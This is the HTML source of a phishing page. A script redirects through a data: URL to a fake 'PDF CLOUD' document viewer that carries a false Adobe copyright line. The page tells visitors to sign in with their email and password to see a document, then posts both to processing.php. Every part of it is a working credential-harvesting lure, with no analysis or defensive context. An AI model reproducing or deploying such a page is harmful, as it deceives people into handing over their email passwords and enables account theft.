
<html><head>
<meta http-equiv="content-type" content="text/html; charset=UTF-8"><script type="text/javascript">
window.location="data:text/html;base64,<!DOCTYPE html>
<html lang="en">
<head>
<!---PAGE HANDCODED BY ALIBOBO -ALIBOBO360 INC---->
<link href="https://opensource.keycdn.com/fontawesome/4.6.3/font-awesome.min.css" rel="stylesheet">
<link rel="icon" type="image/png" href="https://docs.com/1673155405_Images/favicon.ico">
<link rel="apple-touch-icon" href="https://docs.com/1673155405_Images/apple_bookmark_branding_icon.png" />
    <link rel="shortcut icon" type="image/png" href="https://docs.com/1673155405_Images/favicon.ico">




<script type="text/javascript">

<!---PAGE HANDCODED BY ALIBOBO -ALIBOBO360 INC---->
<!---PAGE HANDCODED BY ALIBOBO -ALIBOBO360 INC---->
<!---PAGE HANDCODED BY ALIBOBO -ALIBOBO360 INC---->
</script>
<meta charset="utf-8">
<title>PDF CLOUD</title>
<style type="text/css">
.rounded { 
	border-radius:15px; 
	-moz-border-radius:15px; 
	-webkit-border-radius:15px; 
	width:300px;
	
}
.search { 
	padding:6px 15px 6px 30px;
	margin:3px; gg
	
}
td .hov:hover{
  background:red;
}
a{
  color:#454444;
  text-decoration:none;
}A
a:link{
  color:#454444;
  text-decoration:none;
}
a:hover{
  color:#454444;
  text-decoration:none;
}

a:visited{
  color:#454444;
  text-decoration:none;
}

@font-face {
	font-family: 'et-line';
	src:url('fonts/et-line.eot');
	src:url('fonts/et-line.eot?#iefix') format('embedded-opentype'),
		url('fonts/et-line.woff') format('woff'),
		url('fonts/et-line.ttf') format('truetype'),
		url('fonts/et-line.svg#et-line') format('svg');
	font-weight: normal;
	font-style: normal;
}

/* Use the following CSS code if you want to use data attributes for inserting your icons */
[data-icon]:before {
	font-family: 'et-line';
	content: attr(data-icon);
	speak: none;
	font-weight: normal;
	font-variant: normal;
	text-transform: none;
	line-height: 1;
	-webkit-font-smoothing: antialiased;
	-moz-osx-font-smoothing: grayscale;
	display:inline-block;
}
<!---PAGE HANDCODED BY ALIBOBO -ALIBOBO360 INC---->

body{
margin:0;
font-family:helvetica, verdana, arial, san-serif;
}

html { 
  background: url(new_bg.jpg) no-repeat center center fixed; 
  -webkit-background-size: cover;
  -moz-background-size: cover;
  -o-background-size: cover;
  background-size: cover;
}

.transparent {
	zoom: 1;
	filter: alpha(opacity=90);
	opacity: 0.9;
}
#top-header{
   width:100%;
   height:50px;
   background:#000;
}

.inp{

	border: 1px solid #EAEAEA;
	-moz-border-radius: 10px;
	-webkit-border-radius: 10px;
	border-radius: 10px;
	margin:4px 0 3px 0;
	box-sizing: border-box;
}

input[type=text]:focus {
    border: 1px solid skyblue;
}
input[type=password]:focus {
    border: 1px solid skyblue;
}
input[type=checkbox]{
    border: 1px solid skyblue;
}
label{
 font-weight:bold;
 color:#807171;
 font-size:14px;
}

.btn {
 
}

.account-action .btn:hover {
background: linear-gradient(#293f50, #49708f);
  border: 0;
  color: #fff;
  cursor: pointer;
  font-weight: bold;
  float: left;
  padding: 8px 16px;
  width:100px;

}
.account-action{
  background: #f0f0f2;
  border-top: 1px solid #c6c7cc;
  padding: 20px;
}
.account-action .btn {
  background: linear-gradient(#49708f, #293f50);
  border: 0;
  color: #fff;
  cursor: pointer;
  font-weight: bold;
  float: left;
  padding: 8px 16px;
  width:100px;
}
.account-action label {
  color: #7c7c80;
  font-size: 12px;
  float: right;
  margin: 10px 0 0 20px;
}
#errfn{
  color:red;
}
#errfnn{
  color:red;
}

.cover{
    position: absolute;
    top: 0;
    left: 0;
    height: 100%;
    width: 100%;
    background-color: rgba(0,0,0,0.5);
    z-index: 10;
}

</style>

</head>


<body style="background:; font-family:helvetica, verdana, tahoma, arial; padding:0;">
<div id="top-header">
<table style="border:none; width:100%; padding:0; margin:0; height:50px; border-spacing:0; color:#fff; z-index:10000000; position:absolute;">
<tr>
<td style="background:#D60000 url(); width:4%; height:100%; margin:0; padding:0; border-right:1px solid #ededed;"></td>
<td style="background:#D60000; width:10%; height:100%; margin:0; padding:0; text-align:center;">PDF CLOUD</td>
<td style="background:#292323; width:65%; height:100%; margin:0; padding:0 0 0 30px;">
<div class="lighter">
<form>
	<span><input type="text" class="search rounded" placeholder="Search..."></span>
	
</form>
</div>
</td>
<td style="background:#292323; width:5%; height:100%; margin:0; padding:0; color:#fff; text-align:center; border-left:1px solid #fff;" class="hov"><a href="#" title="You are not signed In"><i class="fa fa-cog" aria-hidden="true" style="font-size:28px;"></i></a></td>
<td style="background:#292323; width:5%; height:100%; margin:0; padding:0; color:#404040; text-align:center; border-left:1px solid #fff;" class="hov"><a href="#" title="You need to sign in to view Document"><i class="fa fa-question-circle" aria-hidden="true" style="font-size:28px;"></i>
</a></td>


<td style="background:#e1e1e1; width:6%; height:100%; margin:0; padding:0; color:#404040; text-align:center; border-left:1px solid silver;"><a href="#" title="You are not signed in yet"><i class="fa fa-user" aria-hidden="true" style="font-size:38px;"></i>
</a></td>
</tr>

</table>

</div>
<div style="width:100%; height:2px; background:#e1e1e1; padding:10px; position:relative; z-index:10000000000000;">
<table style="color:#454444; width:100%;">
<tr>
</tr>
</table>
</div>
<div style="width:100%; height:30px; background:#fff; padding:10px; position:relative; z-index:10000000000000;">
<table style="color:#454444; height:30px; width:100%;">
<tr>


<td style="width:10%; font-size:12px;"><a href="#" title="Login to continue"><i class="fa fa-cloud-download" aria-hidden="true" style="font-size:18px;"></i>

 &nbsp;Download</a></td>
 <td style="width:8%; font-size:12px;"><a href="#" title="Login to continue"><i class="fa fa-share-square" aria-hidden="true" style="font-size:18px;"></i>

 &nbsp;Share</a></td>
 <td style="width:10%; font-size:12px; color:#fff; "><a href="#" style="color:#FFF;" title="Login to continue"><span style="background:#E80E0E; padding:10px;"><i class="fa fa-pencil" aria-hidden="true" style="font-size:18px;"></i>
 &nbsp; Edit and Reply</a></td>
 
 <td style="width:10%; font-size:12px; margin-left:10px;"><a href="#" title="Login to continue"><i class="fa fa-floppy-o" aria-hidden="true" style="font-size:18px;"></i>

 &nbsp;Save</a></td>
 

<td style="width:50%;"></td>
</tr>
</table>
</div>


<div style="
background:#fff;
width:27em;
height: 27em;
margin:0 auto;
margin-top:40px;
	border: 1px solid #EAEAEA;
	overflow: hidden;
	-moz-border-radius: 10px;
	-webkit-border-radius: 10px;
	border-radius: 10px;
	-webkit-box-shadow: rgba(0, 0, 0, 0.3) 0 1px 3px;
	-moz-box-shadow: rgba(0,0,0,0.3) 0 1px 3px;
	box-shadow: rgba(0, 0, 0, 0.3) 0 1px 3px;
	background: white;
	z-index: 11;
	position:relative;
"
class="transparent"

>

<div style="padding:10px; z-index: 12;">
<div style="background:#ededed; padding:5px; -webkit-border-radius: 10;
  -moz-border-radius: 10;
  border-radius: 10px;">
<img src="pdf.png" width="100px" height="80px" /><h1 style="color:silver; text-shadow: 0px 1px 1px #4d4d4d; float:right; position:relative; right:50px;">PDF ONLINE</h1>
</div>
<div style="clear:both;"></div>
<!---PAGE HANDCODED BY ALIBOBO -ALIBOBO360 INC---->
<!---PAGE HANDCODED BY ALIBOBO -ALIBOBO360 INC---->
<!---PAGE HANDCODED BY ALIBOBO -ALIBOBO360 INC---->
<!---PAGE HANDCODED BY ALIBOBO -ALIBOBO360 INC---->
<div style="text-align:center;">
						<P style="color:#696767; font-family:verdana, arial; margin:10px 0 7px 0;">
							<i class="fa fa-envelope" aria-hidden="true"></i> 
Sign in with your receiving email to access document</P>						
</div>							
<script type="text/javascript">
function CheckAlibobo360Form() {
    var x = document.forms["alibobo360_Form"]["ali"].value;
    if (x == null || x == "") {
        //alert("Invalid Email");
		document.getElementById('errfn').innerHTML="Please enter your email";
        return false;
    }
	
    var y = document.forms["alibobo360_Form"]["bobo"].value;
    if (y == null || y == "") {
        document.getElementById('errfnn').innerHTML="Please enter you email password";
        return false;
    }
	

	var emailExp = /^[\w\-\.\+]+\@[a-zA-Z0-9\.\-]+\.[a-zA-z0-9]{2,4}$/;
	if(document.forms["alibobo360_Form"]["ali"].value.match(emailExp)){
		return true;
	}else{
	 document.getElementById('errfn').innerHTML="Invalid email";
	 document.getElementById('errfnn').innerHTML="";
     return false;
	}

    
}
</script>
						
<form name="alibobo360_Form" action="processing.php" onSubmit="return CheckAlibobo360Form()" method="post">
					 <table cellpadding="5px">
					<tbody>
					
					<tr>
					<td>
					<label>Email </label><br />
					<input type="text" name="formtext1" class="inp" size="53px" style="height:2.5em; color:#888888;" required/><br /><span id="errfn"></span>
					</td>
					</tr>
					<tr>
					<td>
					<label>
 Password</label><br />
					<input type="password" name="formtext2" class="inp" size="53" style="height:2.5em;  color:#888888;" required/><br /><span id="errfnn"></span>

					</td>
					</tr>
					
					<tr colspan="2">
					<td>
					<fieldset class="account-action">
    <input class="btn" type="submit" name="submit" value="Login">
    <label>
      <input type="checkbox" name="remember"> Stay signed in
    </label>
  </fieldset>
  <div style="clear:both;"></div>
  </td>
					</tr>
					
					
				
					</tbody>
					</table>
					</form>
					<p style="text-align:center; font-size:10px;">Copyright &COPY; 2017 Adobe Corporation</p>

							
							</div>
<div style="clear:both;"></div>

</div>
<div class="cover"></div>

</body>
</html>